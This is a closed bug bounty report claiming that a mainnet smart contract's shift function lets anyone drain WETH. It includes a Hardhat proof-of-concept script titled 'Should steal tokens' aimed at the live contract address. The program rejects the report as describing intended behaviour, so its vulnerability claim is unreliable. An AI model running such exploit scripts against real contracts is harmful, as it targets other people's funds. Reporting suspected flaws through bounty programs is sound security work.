Report #24867

Report Date

October 13, 2023

Status

Closed

Payout

attacker will steal funds

‣

Report Info

Report ID

#24867

Report type

Smart Contract

Has PoC?

Yes

Target

https://etherscan.io/address/0xBEA0e11282e2bB5893bEcE110cF199501e872bAd

Impacts

Direct theft of any user funds, whether at-rest or in-motion, other than unclaimed yield

Description

Bug Description- smart contract will permanently lose funds

Impact- loss of funds

Proof of concept

Step-1- call the shift function of the smart contract,function will execute without permission. parameter- 1-tokenOut-token's smart contract address 2-minAmountOut-amount of token's to send 3-recipient-address to send token's Step-2- call the getShiftOut function of the smart contract to check the smart contract's stored token balance,function will execute without permission. parameter-1-tokenOut-token's smart contract address, the WETH token got lost

Code- const { expect } = require("chai"); const { hexlify } = require("ethers/lib/utils"); const { ethers } = require("hardhat");

const Well_Address = "0xBEA0e11282e2bB5893bEcE110cF199501e872bAd";

it("Should steal tokens", async function () {

const [attacker] = await ethers.getSigners();

const well = await ethers.getContractAt("Well", Well_Address);

const user = "0x7dA1ebA26f059EB3184694AE64b2bb92388d91Cc"; const WETH = "0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2";

var token_before = await well.getShiftOut(WETH); console.log(token before: ${ethers.utils.formatEther(token_before).toString()} WETH);

await well.connect(attacker).shift(WETH, token_before, user);

var token_after = await well.getShiftOut(WETH); console.log(token after: ${ethers.utils.formatEther(token_after).toString()} WETH); });

BIC Response

This is not a valid bug report because this is intended use of the shift function and it's unclear what the reported vulnerability is intended to be.

Due to these reasons, we are closing the submission and no reward will be issued.